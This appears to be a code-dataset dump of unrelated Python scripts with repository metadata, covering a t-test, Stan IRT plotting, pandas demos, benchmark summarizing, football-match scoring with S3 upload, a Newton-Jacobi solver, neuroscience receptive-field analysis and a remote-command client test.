log api example: log('output is: ' + str(output))
'''
from scipy.stats import t as T
from scipy.stats import f
import numpy as np
class Solution():
    """Paired t-test: did 2014 values grow beyond 10000x the 2010 values?"""

    def solve(self):
        """Run a one-sided paired t-test at alpha = 0.05.

        Returns [t_statistic, 'YES'] when the mean difference is
        significantly positive, [t_statistic, 'NO'] otherwise.
        """
        t_2010 = ['6.0', '17.3', '104.3', '101.0', '120.4', '91.9', '30.0', '41.9', '23.9', '101.2',
                  '67.7', '48.7', '39.9', '49.0', '136.6', '117.6', '52.7', '64.9', '101.3', '83.5', '2.1',
                  '58.6', '94.6', '62.4', '41.8', '0.2', '74.2', '40.1', '12.7', '27.8', '51.5']
        t_2014 = ['52041', '207793', '176469', '88880', '96190', '130672', '57246', '65987', '172867', '110665',
                  '82021', '41483', '76043', '40756', '81118', '106123', '96222', '21173', '65589', '33045', '1798',
                  '494415', '52040', '70603', '102842', '930', '69103', '72148', '71839', '92369', '74216']
        # Per-pair differences: 2014 value minus the scaled 2010 value.
        d = [float(after) - float(before) * 10000
             for before, after in zip(t_2010, t_2014)]
        mean_diff = np.average(d)
        sample_std = np.std(d, ddof=1)
        n = len(d)
        t_stat = mean_diff / (sample_std / np.sqrt(n))
        # Compare against the upper 5% critical value of t with n-1 dof.
        verdict = 'YES' if t_stat > T.isf(0.05, n - 1) else 'NO'
        return [t_stat, verdict]
# Run the paired t-test and print [t_statistic, verdict].
# (Python 2 print statement -- this module targets Python 2.)
so = Solution()
print so.solve()
|
[
"191850059@smail.nju.edu.cn"
] |
191850059@smail.nju.edu.cn
|
1cfd98dc3d88365f1d5b352e981615a2a6699195
|
cad76727b7e8f15abd7c65e9134f46c4e151f742
|
/Python/stan-irt.py
|
935b90138427857b3cf5d1d7800af1614b34ac80
|
[] |
no_license
|
AMBrown0/DataVizAss02
|
258e3b9d2f38791edf69dfcc9f78dc13400df256
|
22dcf219990540df9835d148f6c6c1219ad8aa15
|
refs/heads/main
| 2023-03-19T17:47:34.186892
| 2021-03-12T10:15:17
| 2021-03-12T10:15:17
| 276,904,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,085
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 12:07:25 2021
@author: andy
"""
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup
import pandas as pd
import os
import glob
import shutil
import pandas as pd
from pathlib import Path
import re
import matplotlib.pyplot as plt
import numpy as np
import math
from datetime import datetime
from os import path
from docx import Document
from sklearn.linear_model import LinearRegression
#LDA Imports
import gensim
import nltk
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
from gensim import corpora, models
from pprint import pprint
np.random.seed(2018)
#nltk.download('wordnet')
#plot
import matplotlib.pyplot as plt
import seaborn as sns
#Lexicon sentiment analysis
from afinn import Afinn
from textblob import TextBlob
import pandas as pd
from pprint import pprint
import pystan
from scipy.special import expit
from matplotlib import pyplot as plt
from numpy.random import normal, randint, binomial, choice
from numpy import percentile, concatenate, array, linspace, append
#%matplotlib inline
from sklearn.metrics import r2_score
# Plot the logistic (inverse-logit) curve that serves as the IRT link function.
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
# NOTE(review): the block below repeats the plot above verbatim -- this looks
# like a copy/paste leftover; confirm whether the duplicate is intentional.
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
# Compile the binary IRT Stan model; requires binary_irt.stan in the CWD.
binary_irt_model = pystan.StanModel(file="binary_irt.stan")
|
[
"andy@jivedive.local"
] |
andy@jivedive.local
|
b6683e488f292d0548f63346115c9b555ac19d7a
|
b7c1e5d140c3c41e86f206047145f7f296fed53a
|
/Textbook/Chapter 5/pandasSeriesVsDataFrame.py
|
e8417f1cc0a8b2c5317aff757d4ee250887236df
|
[
"MIT"
] |
permissive
|
jlcatonjr/Learn-Python-for-Stats-and-Econ
|
c2fbe29b324e70ceb832beafdd42d0accb37d9f9
|
194671592937562e08c92e0ef5f4793d4911701c
|
refs/heads/master
| 2023-05-11T17:17:05.934290
| 2023-05-10T20:12:10
| 2023-05-10T20:12:10
| 148,912,065
| 22
| 21
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
#pandasSeriesVsDataFrame.py
# Demonstrates how the same dict produces different structures as a pandas
# Series versus a DataFrame.
import numpy as np
import pandas as pd
dataDict = {"range":np.arange(10)}
# Series from a dict: one entry per key, so "range" maps to the whole array.
dataSeries = pd.Series(dataDict)
print(dataSeries)
print(dataSeries["range"])
# DataFrame from the same dict: the array becomes a 10-row column "range".
dataDF=pd.DataFrame(dataDict)
print(dataDF)
print(dataDF["range"])
# Positional slice (rows 5..8) of the "range" column.
print(dataDF["range"][5:9])
#print(dataDF.loc[5:9])
|
[
"jlcatonjr@gmail.com"
] |
jlcatonjr@gmail.com
|
de1e37fad3f75f1bdda9b267bc475dc95f331d6c
|
1ebdd01866600631e5db0abba10aab4c66abd4b7
|
/bench/summarize.py
|
45180f1d8cdc521bee6afedcd1a1493151e068df
|
[
"BSD-3-Clause"
] |
permissive
|
UCSD-Modern-Storage-Systems/MSS-KV-lab
|
40abf3b0b14c5145e16df2f084f52b902b9062aa
|
64f3f7bb17f45eedca24615cb9c4965e1cc4b7a2
|
refs/heads/master
| 2020-08-17T11:42:35.343853
| 2019-11-26T17:05:51
| 2019-11-26T17:05:51
| 215,661,403
| 3
| 3
| null | 2019-11-22T05:36:13
| 2019-10-16T23:18:40
|
C++
|
UTF-8
|
Python
| false
| false
| 1,454
|
py
|
import sys
benchmarks = [
('fillseq', '100'),
('fillseq', '1024'),
('fillrandom', '100'),
('fillrandom', '1024'),
('overwrite', '100'),
('overwrite', '1024'),
('readseq', '100'),
('readseq', '1024'),
('readrandom', '100'),
('readrandom', '1024'),
('deleteseq', '100'),
('deleteseq', '1024'),
('deleterandom', '100'),
('deleterandom', '1024'),
]
if __name__ == "__main__":
    # Python 2 script: summarize db_bench-style outputs into one CSV row set.
    # Usage guard: expects exactly one argument, the CSV output path.
    if len(sys.argv) != 2:
        print "python %s output_file" % sys.argv[0]
        sys.exit(1)
    outfile_name = sys.argv[1]
    # Each <bench>_<valsize>.txt ends with four result lines shaped like:
    # fillrandom   :      15.140 micros/op 66048 ops/sec;   65.5 MB/s
    # fillrandom   :      15.140 micros/op 66051 ops/sec;   65.5 MB/s
    # fillrandom   :      15.100 micros/op 66225 ops/sec;   65.7 MB/s
    # fillrandom   :      15.047 micros/op 66460 ops/sec;   65.9 MB/s
    files = []
    tputs = []
    for name, val_size in benchmarks:
        file_name = '%s_%s.txt' % (name, val_size)
        files.append(file_name)
        tput = 0
        try:
            with open(file_name) as f:
                # Parse the last 4 lines; words[4] is the ops/sec figure.
                lines = f.readlines()[-4:]
                for line in lines:
                    words = line.strip().split()
                    bench_name = words[0]
                    assert bench_name == name
                    # NOTE(review): this SUMS the four runs rather than
                    # averaging them -- confirm whether a mean was intended.
                    tput += int(words[4])
        except:
            # Missing/unreadable file or malformed line -> record 0.
            tput = 0
        tputs.append(tput)
    # Prepend a header cell and the cross-benchmark mean, then write CSV.
    files.insert(0, 'AverageThroughput')
    print tputs
    mean = int(sum(tputs) / len(tputs))
    print "avg: %d ops/sec" % mean
    tputs.insert(0, mean)
    tputs = map(lambda x: str(x), tputs)
    with open(outfile_name, 'w') as f:
        f.write("%s\n" % ",".join(files))
        f.write("%s\n" % ",".join(tputs))
|
[
"juk146@eng.ucsd.edu"
] |
juk146@eng.ucsd.edu
|
137acc6d4721ec38018a668237bf95435195db61
|
6f2a072148725d98d2bc96235fde4e0d83aa9bbd
|
/lib/assets/scoring.py
|
ce268a59ff200a95cdabcb147bf66a9dc28f670e
|
[] |
no_license
|
jjh5166/prempicks
|
1fbf86fb4fe2eec952245f7ed9d4c9441a03257c
|
24b8951b57049a2d3872b917e7ad1e79156f2f53
|
refs/heads/master
| 2023-01-22T02:59:15.803754
| 2021-01-11T21:01:14
| 2021-01-11T21:01:14
| 144,220,632
| 0
| 0
| null | 2023-01-19T14:06:00
| 2018-08-10T01:20:46
|
Ruby
|
UTF-8
|
Python
| false
| false
| 3,060
|
py
|
import http.client, sys, os, json, boto3
from os.path import join, dirname
from dotenv import load_dotenv
dotenv_path = join(dirname(__name__), '.env')
load_dotenv(dotenv_path)
APIkey = str(os.getenv('FOOTBALL_API_KEY'))
AwsAccessKeyID = str(os.getenv('AWS_ACCESS_KEY_ID'))
AwsSecretAccessKey = str(os.getenv('AWS_SECRET_ACCESS_KEY'))
AwsRegion = str(os.getenv('AWS_REGION'))
AwsBucket = str(os.getenv('S3_BUCKET'))
matchday = str(sys.argv[1])
request_string = f'/v2/competitions/PL/matches/?matchday={matchday}'
connection = http.client.HTTPConnection('api.football-data.org')
headers = {'X-Auth-Token': APIkey}
connection.request('GET', request_string, None, headers)
response = json.loads(connection.getresponse().read().decode())
s3 = boto3.resource(
's3',
region_name=AwsRegion,
aws_access_key_id=AwsAccessKeyID,
aws_secret_access_key=AwsSecretAccessKey
)
with open('app/assets/data/code_to.json') as jfile:
teamcodes = json.load(jfile)
content = s3.Object(AwsBucket, 'lastyr.json')
file_content = content.get()['Body'].read().decode('utf-8')
lastszn = json.loads(file_content)['standings']
topSix = lastszn[:6]
newThree = lastszn[17:]
class ScoreMatch:
    """Score one finished Premier League match for the picks game.

    Relies on module-level lookups: ``teamcodes`` (API team id ->
    abbreviation), ``topSix`` and ``newThree`` (last season's top-6 and
    promoted sides). After construction, ``wTeam``/``lTeam`` hold the team
    abbreviations and ``wScore``/``lScore`` their point awards.
    """
    def __init__(self, data):
        # `data` is one match dict from the football-data.org v2 matches API.
        self.hGoals = data['score']['fullTime']['homeTeam']
        self.aGoals = data['score']['fullTime']['awayTeam']
        self.hTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
        self.aTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
        if self.hGoals == self.aGoals:
            # NOTE(review): draws skip the topSixOrNew adjustment that
            # decided matches receive -- confirm that is intended.
            self.draw(data)
        else:
            self.tally(self.hGoals, self.aGoals)
            self.assignTeams(data, self.diff)
            self.topSixOrNew(self.wTeam, self.lTeam)
    def draw(self, data):
        """Handle a draw: home stored as 'winner', away as 'loser', 1 pt each."""
        self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
        self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
        self.wScore = self.lScore = 1
    def tally(self, goals1, goals2):
        """Compute base points from the (home - away) goal difference."""
        self.diff = goals1-goals2
        # A zero product means one side never scored: a clean sheet.
        cs = True if goals1*goals2 == 0 else False
        # Winner: 3 pts for a 3+ goal margin, else 2; +1 for a clean sheet.
        self.wScore = 3 if abs(self.diff) >= 3 else 2
        if cs:
            self.wScore += 1
        # Loser: -4 for a 3+ goal margin, else -3.
        self.lScore = -4 if abs(self.diff) >= 3 else -3
    def topSixOrNew(self, winner, loser):
        """Adjust points when the loser was top-six or the winner was promoted."""
        if loser in topSix:
            self.lScore -= 1
            self.wScore += 1
        if winner in newThree:
            self.wScore += 1
    def assignTeams(self, data, diff):
        """Set wTeam/lTeam from the sign of the (home - away) goal difference."""
        if diff > 0:
            self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
            self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
        else:
            self.wTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
            self.lTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
# Score every finished match of the requested matchday and upload the
# {team_abbreviation: points} map to S3 as scores/matchday<N>.json.
scores = {}
for m in response['matches']:
    if m['status'] == "FINISHED":
        match = ScoreMatch(m)
        scores[match.wTeam] = match.wScore
        scores[match.lTeam] = match.lScore
scores_json = json.dumps(scores)
filename = 'scores/matchday' + matchday + '.json'
s3.Object(AwsBucket, filename).put(Body=scores_json)
|
[
"jjh5166@gmail.com"
] |
jjh5166@gmail.com
|
23880f4bb3b0fbc30871786ed1a37bc44186075e
|
19651a8d1eabe37f74dc7562c2bf3b5dcb990b32
|
/newton-jakobi.py
|
70c4afc5f7fadfbe2a2583978042a64cfb2769b3
|
[] |
no_license
|
damoklov/numeric-methods
|
b9f7571244da8da65b6fed31747c45eaefa7973d
|
3b9cde027ed1330862487f8b9eb72ddc66a95b25
|
refs/heads/master
| 2023-02-11T19:15:29.305119
| 2020-12-28T12:22:25
| 2020-12-28T12:22:25
| 311,182,365
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,754
|
py
|
def f1(x1, x2):
    """First residual of the nonlinear system: x2^2 - x1^2 - 0.1 - x1."""
    residual = x2**2 - x1**2 - 0.1 - x1
    return residual
def f2(x1, x2):
    """Second residual of the nonlinear system: 0.1 - 2*x1*x2 - x2."""
    residual = 0.1 - 2*x1*x2 - x2
    return residual
def newton_jakobi():
    """Solve the 2x2 nonlinear system (f1, f2) = 0 by Newton's method,
    starting from (0.5, 0.5), and print the root and residuals.

    Each step builds a finite-difference Jacobian, inverts it via
    reverse_matrix, and applies x <- x - J^-1 * f. Iteration stops when the
    relative change of either component drops below eps.
    """
    eps = 0.001
    argument_vector = [0.5, 0.5]
    prev_vector = [0, 0]
    # 4x4 identity; reverse_matrix only indexes the leading 2x2 corner here.
    identity_matrix = initialize_matrix()
    f = [0, 0]
    while True:
        f[0] = f1(argument_vector[0], argument_vector[1])
        f[1] = f2(argument_vector[0], argument_vector[1])
        jacobian = build_jacobian(argument_vector, f)
        reversed_jacobian = reverse_matrix(jacobian, identity_matrix)
        for i in range(len(f)):
            x_old = argument_vector[i]
            prev_vector[i] = x_old
            increment = 0.0
            # NOTE(review): Newton's update is sum_j Jinv[i][j] * f[j];
            # this uses f[i] for every j, which looks like a bug -- confirm.
            for j in range(2):
                increment += reversed_jacobian[i][j] * f[i]
            argument_vector[i] = prev_vector[i] - increment
        # Relative-change stopping test (divides by the current iterate, so
        # a root at exactly zero would raise ZeroDivisionError).
        if abs((argument_vector[0] - prev_vector[0])/argument_vector[0]) < eps:
            break
        elif abs((argument_vector[1] - prev_vector[1])/argument_vector[1]) < eps:
            break
    print(argument_vector)
    print(f1(argument_vector[0], argument_vector[1]))
    print(f2(argument_vector[0], argument_vector[1]))
def build_jacobian(argument_vector, function_vector):
    """Forward-difference Jacobian of (f1, f2) at *argument_vector*.

    *function_vector* must hold (f1, f2) already evaluated at
    *argument_vector*; entry [i][j] approximates df_i/dx_j with step h.
    Note h = 1 is a very coarse step for a finite difference.
    """
    h = 1
    args = [0, 0]
    f = [0, 0]
    jacobian = [[0, 0], [0, 0]]
    for i in range(2):
        for j in range(2):
            # Reset args to the base point, then perturb coordinate j by h.
            for k in range(2):
                args[k] = argument_vector[k]
            args[j] = argument_vector[j] + h
            f[0] = f1(args[0], args[1])
            f[1] = f2(args[0], args[1])
            jacobian[i][j] = (f[i] - function_vector[i])/h
    return jacobian
def initialize_matrix(size=4):
    """Return a *size* x *size* identity matrix as nested lists.

    The size parameter generalizes the original hard-coded 4x4 matrix while
    keeping the no-argument call backward compatible. The original also
    wrote 0 into cells that were already 0; the comprehension drops that
    redundant work.
    """
    return [[1 if row == col else 0 for col in range(size)]
            for row in range(size)]
def reverse_matrix(matrix, identity_matrix):
    """Invert *matrix* by solving A x = e_i for every identity column.

    Each call to roots() returns column i of the inverse, which is written
    into column i of the result.
    """
    size = len(matrix)
    reversed_matrix = [[0 for _ in range(size)] for _ in range(size)]
    for i in range(size):
        solution = roots(i, matrix, identity_matrix)
        for j in range(len(solution)):
            reversed_matrix[j][i] = solution[j]
    return reversed_matrix
def roots(counter, matrix, identity_matrix):
    """Solve matrix * x = identity_matrix[:, counter] by Gaussian elimination.

    Sets up working copies, runs the forward elimination (direct_way) with
    full pivoting, back-substitutes (reverse_way), and undoes the column
    permutations (order_vector) before returning the solution vector.
    """
    size = len(matrix)
    coefficients = [[0 for _ in range(size)] for _ in range(size)]
    free_members = [0 for _ in range(size)]
    argument_positions = [0 for _ in range(size)]
    result_coefficients = [[0 for _ in range(size)] for _ in range(size)]
    result_free_members = [0 for _ in range(size)]
    free_members, coefficients, argument_positions = initialize_system(
        free_members, identity_matrix, counter, argument_positions, coefficients, matrix)
    result_free_members, free_members, coefficients, result_coefficients = direct_way(
        result_free_members, free_members, coefficients, result_coefficients, argument_positions, size)
    result = reverse_way(result_free_members, result_coefficients)
    result, argument_positions = order_vector(result, argument_positions)
    return result
def order_vector(result, argument_positions):
    """Undo the column permutation recorded in *argument_positions*.

    Swaps result entries (in place) until each position i again holds the
    value of variable i, and resets argument_positions accordingly.

    BUG FIX: the original guard was `if argument_positions != i`, which
    compares the whole list to an int and is therefore always True. The
    extra iterations it triggered were self-swaps (no-ops), so correcting
    the comparison to `argument_positions[i] != i` preserves behavior while
    removing the redundant work.
    """
    for i in range(len(result)):
        if argument_positions[i] != i:
            target = argument_positions[i]
            # Swap the misplaced value into its home slot.
            result[i], result[target] = result[target], result[i]
            argument_positions[i] = argument_positions[target]
            argument_positions[target] = target
    return result, argument_positions
def direct_way(result_free_members, free_members, coefficients, result_coefficients, argument_positions, size):
    """Forward elimination pass of Gaussian elimination with full pivoting.

    For each pivot row i: optimize_matrix swaps the largest remaining
    element into the pivot slot, the normalized right-hand side is stored in
    result_free_members, and the rows below are reduced. The normalized
    upper-triangular factors accumulate in result_coefficients for the
    later back-substitution.
    """
    for i in range(size):
        coefficients, free_members, argument_positions, result_coefficients = optimize_matrix(
            i, coefficients, free_members, argument_positions, result_coefficients, size)
        result_free_members[i] = free_members[i] / coefficients[i][i]
        for j in range(i + 1, size):
            free_members[j] = free_members[j] - coefficients[j][i] * result_free_members[i]
            for k in range(i + 1, size):
                result_coefficients[i][k] = coefficients[i][k] / coefficients[i][i]
                coefficients[j][k] = coefficients[j][k] - coefficients[j][i] * result_coefficients[i][k]
    return result_free_members, free_members, coefficients, result_coefficients
def reverse_way(result_free_members, result_coefficients):
    """Back-substitution on the normalized upper-triangular system.

    solution[i] = rhs[i] - sum_{j>i} U[i][j] * solution[j], computed from
    the last row upwards.
    """
    n = len(result_free_members)
    solution = [0 for _ in range(n)]
    for row in reversed(range(n)):
        acc = 0.0
        for col in range(row + 1, n):
            acc += result_coefficients[row][col] * solution[col]
        solution[row] = result_free_members[row] - acc
    return solution
def initialize_system(free_members, identity_matrix, counter, argument_positions, coefficients, matrix):
    """Prepare the working system for one solve: copy *matrix* into
    *coefficients*, load column *counter* of the identity into
    *free_members*, and reset the column-permutation record to identity.

    All three output containers are mutated in place and also returned.
    """
    size = len(matrix)
    for row in range(size):
        free_members[row] = identity_matrix[row][counter]
        argument_positions[row] = row
        # In-place row copy keeps the caller's inner list objects alive.
        coefficients[row][:] = list(matrix[row])
    return free_members, coefficients, argument_positions
def optimize_matrix(r, coefficients, free_members, argument_positions, result_coefficients, size):
    """Full-pivoting step: move the largest-magnitude coefficient into the
    pivot slot (r, r) by swapping rows and columns, keeping free_members and
    the column-permutation record consistent.
    """
    # NOTE(review): the initial candidate is NOT taken in absolute value,
    # and the search scans the whole matrix (i, j from 0) rather than the
    # untouched submatrix from r onward -- both look suspicious; confirm.
    max_coefficient = coefficients[r][r]
    max_row = r
    max_col = r
    for i in range(size):
        for j in range(size):
            if max_coefficient < abs(coefficients[i][j]):
                max_coefficient = abs(coefficients[i][j])
                max_row = i
                max_col = j
    # Row swap: right-hand side and every column of the coefficient matrix.
    free_members = swap_array_values(free_members, r, max_row)
    for l in range(size):
        coefficients = swap_matrix_values_row(coefficients, r, max_row, l)
    # Column swap: record the permutation so order_vector can undo it.
    argument_positions = swap_argument_positions(argument_positions, r, max_col)
    for m in range(size):
        if m < r:
            # Rows above the pivot already live in result_coefficients.
            result_coefficients = swap_matrix_values_columns(result_coefficients, m, r, max_col)
        else:
            coefficients = swap_matrix_values_columns(coefficients, m, r, max_col)
    return coefficients, free_members, argument_positions, result_coefficients
def swap_matrix_values_columns(matrix, r, fc, sc):
    """Swap the entries of row *r* at columns *fc* and *sc*, in place."""
    matrix[r][fc], matrix[r][sc] = matrix[r][sc], matrix[r][fc]
    return matrix
def swap_argument_positions(argument_positions, r, max_col):
    """Swap entries *r* and *max_col* of the permutation record, in place."""
    argument_positions[r], argument_positions[max_col] = (
        argument_positions[max_col], argument_positions[r])
    return argument_positions
def swap_array_values(free_members, fc, sc):
    """Swap elements *fc* and *sc* of the vector, in place."""
    free_members[fc], free_members[sc] = free_members[sc], free_members[fc]
    return free_members
def swap_matrix_values_row(matrix, fc, sc, col):
    """Swap the entries of column *col* between rows *fc* and *sc*, in place."""
    matrix[fc][col], matrix[sc][col] = matrix[sc][col], matrix[fc][col]
    return matrix
if __name__ == '__main__':
newton_jakobi()
|
[
"mishanya@protonmail.com"
] |
mishanya@protonmail.com
|
aa2900526f8aa579b7ea48f1111b139ef3a08d84
|
ea96439b3fe8745e06875aa8913d487c2715d2fc
|
/NeuroAnalysisTools/scripts/analysis_database/0150_plot_ori_vs_rf_axis_DS.py
|
bb4e8680d69bc7cc65c1d6de2cc656954ee14eb7
|
[] |
no_license
|
zhuangjun1981/NeuroAnalysisTools
|
00561ddd1ee8339b5c2c7ab5d7318ac207460c5c
|
0c7acdb745ef93e009ec538af11252e743f9d430
|
refs/heads/master
| 2022-07-18T05:55:22.200409
| 2022-07-07T23:01:29
| 2022-07-07T23:01:29
| 226,148,154
| 14
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,877
|
py
|
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import NeuroAnalysisTools.SingleCellAnalysis as sca
import scipy.stats as stats
import h5py
# df_path = r"G:\bulk_LGN_database\dataframe_190530171338.csv"
# rf_maps_folder = r"intermediate_results\rf_maps_dataframes_190529210731"
df_path = r"G:\bulk_LGN_database\dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30.csv"
rf_maps_folder = r"G:\bulk_LGN_database\intermediate_results" \
r"\rf_maps_dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30"
depths = [50, 100, 150, 200, 250, 300, 350, 400,]
mouse_ids = ['M360495', 'M376019', 'M386444', 'M426525', 'M439939', 'M439943']
# mouse_ids = ['M439939']
dire_type = 'peak_dire' # 'vs_dire' or 'peak_dire'
response_dir = 'pos'
response_type = 'dff'
post_process_type = 'ele' # 'raw', 'ele' or 'rec'
skew_thr = 0.6
dgc_peak_z_thr = 3.
dgc_p_anova_thr = 0.01
dsi_type = 'gdsi'
dsi_thr = 0.5
osi_type = 'gosi'
osi_thr = 1. / 3.
ellipse_aspect_thr = 1.0
curr_folder = os.path.dirname(os.path.realpath(__file__))
os.chdir(curr_folder)
if dire_type == 'peak_dire' and (post_process_type == 'ele' or post_process_type == 'rec'):
dire_pp = 'raw'
else:
dire_pp = post_process_type
print('loading csv file: {}'.format(df_path))
df = pd.read_csv(df_path)
print('csv file loaded.')
df = df[(df['mouse_id'].isin(mouse_ids)) & \
(df['skew_fil'] >= skew_thr) & \
(df['dgc_{}_peak_z'.format(response_dir)] >= dgc_peak_z_thr) & \
(df['dgc_p_anova_{}'.format(response_type)] <= dgc_p_anova_thr) & \
(np.isfinite(df['rf_{}_on_peak_z'.format(response_dir)]))]
dsdf = df[(df['dgc_{}_{}_{}_{}'.format(response_dir, dsi_type, post_process_type, response_type)] >= dsi_thr)]
ds_diff_onoff = []
ds_diff_on = []
ds_diff_off = []
# For each direction-selective ROI, compare its grating-derived preferred
# orientation with the axis implied by its spatial receptive field(s), and
# bucket the angular difference by which subfields (ON/OFF) are available.
for roi_i, roi_row in dsdf.iterrows():
    date = int(roi_row['date'])
    mid = roi_row['mouse_id']
    plane_n = roi_row['plane_n']
    roi_n = roi_row['roi_n']
    # Open the per-session receptive-field map file (one group per polarity).
    map_fn = '{}_{}_{}_{}'.format(date, mid, plane_n, response_dir)
    map_f = h5py.File(os.path.join(rf_maps_folder, map_fn + '.hdf5'), 'r')
    on_grp = map_f['{}_ON'.format(map_fn)]
    off_grp = map_f['{}_OFF'.format(map_fn)]
    # Preferred direction from drifting gratings, folded to an orientation.
    dire = roi_row['dgc_{}_{}_{}_{}'.format(response_dir, dire_type, dire_pp, response_type)]
    ori = sca.dire2ori(dire)
    if roi_n in on_grp.keys() and roi_n in off_grp.keys():
        # Both subfields: use the ON-to-OFF center displacement as the axis.
        rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
        rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
        c_alt_on, c_azi_on = rf_on.get_weighted_rf_center()
        c_alt_off, c_azi_off = rf_off.get_weighted_rf_center()
        # NOTE(review): raises ZeroDivisionError / yields nan if the two
        # azimuth centers coincide -- confirm this cannot happen upstream.
        onoff_ang = np.arctan((c_alt_on - c_alt_off) / (c_azi_on - c_azi_off))
        onoff_ang = onoff_ang * 180. / np.pi
        onoff_ang = sca.dire2ori(onoff_ang)
        # Fold the orientation difference into [0, 90] degrees.
        curr_diff = abs(onoff_ang - ori)
        if curr_diff > 90.:
            curr_diff = 180 - curr_diff
        ds_diff_onoff.append(curr_diff)
    elif roi_n in on_grp.keys():
        # ON only: use the fitted ellipse's long axis, if elongated enough.
        rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
        ell_on = rf_on.ellipse_fitting(is_plot=False)
        if ell_on is not None and ell_on.get_aspect_ratio() >= ellipse_aspect_thr:
            curr_diff = abs(ell_on.angle - ori)
            if curr_diff > 90.:
                curr_diff = 180 - curr_diff
            ds_diff_on.append(curr_diff)
    elif roi_n in off_grp.keys():
        # OFF only: same ellipse-axis comparison as the ON-only case.
        rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
        ell_off = rf_off.ellipse_fitting(is_plot=False)
        if ell_off is not None and ell_off.get_aspect_ratio() >= ellipse_aspect_thr:
            curr_diff = abs(ell_off.angle - ori)
            if curr_diff > 90.:
                curr_diff = 180 - curr_diff
            ds_diff_off.append(curr_diff)
print('\nDirection Selective ROIs:')
print('\tWith ONOFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_onoff)))
chisq_ds_onoff, p_ds_onoff = stats.chisquare(np.histogram(ds_diff_onoff, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_onoff, p_ds_onoff))
print('\tWith only ON receptive fields:')
print('\t\tn={}'.format(len(ds_diff_on)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_on)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_on)))
chisq_ds_on, p_ds_on = stats.chisquare(np.histogram(ds_diff_on, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_on, p_ds_on))
print('\tWith only OFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_off)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_off)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_off)))
chisq_ds_off, p_ds_off = stats.chisquare(np.histogram(ds_diff_off, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_off, p_ds_off))
ds_diff_all = ds_diff_onoff + ds_diff_on + ds_diff_off
print('\tWith all receptive fields:')
print('\t\tn={}'.format(len(ds_diff_all)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_all)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_all)))
chisq_ds_all, p_ds_all = stats.chisquare(np.histogram(ds_diff_all, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_all, p_ds_all))
plt.hist([ds_diff_onoff, ds_diff_on, ds_diff_off], range=[0, 90], bins=20, stacked=True,
color=['purple', 'r', 'b'], ec='none', alpha=0.5)
plt.show()
|
[
"wood_stocker@hotmail.com"
] |
wood_stocker@hotmail.com
|
7ccca3ee25e9eb35c488266d7448ee7645100a6d
|
9ae680db168db40ae8feae0dc9cb42dacabbd012
|
/functest.py
|
9aa06fc03d61aa5f6d9c42e005721d6c117b51c7
|
[] |
no_license
|
tonysimpson/pyras
|
5ed4ec212b916ecb5eb3b9db8e05b43d585bb8a8
|
defbddffa04aa50c108138a63c3dd76957615994
|
refs/heads/master
| 2021-01-18T13:54:55.572472
| 2014-06-13T09:12:53
| 2014-06-13T09:12:53
| 5,888,372
| 1
| 0
| null | 2014-06-13T09:10:21
| 2012-09-20T15:07:52
|
Python
|
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
# use ipython -i functest.py
# Python 2 interactive smoke test for the pyras remote-command client:
# exercises register/start/stop, groups, file reads and ad-hoc runs against
# a server on localhost. Purely side-effecting; run with a live server.
import pyras
client = pyras.RemoteCommandClient('127.0.0.1')
print client.info()
# Register and start two simple commands (ids are assigned sequentially).
client.register('echo "Hello"')
print client.info()
client.start(1)
client.register('while true; do echo "oh no!"; done')
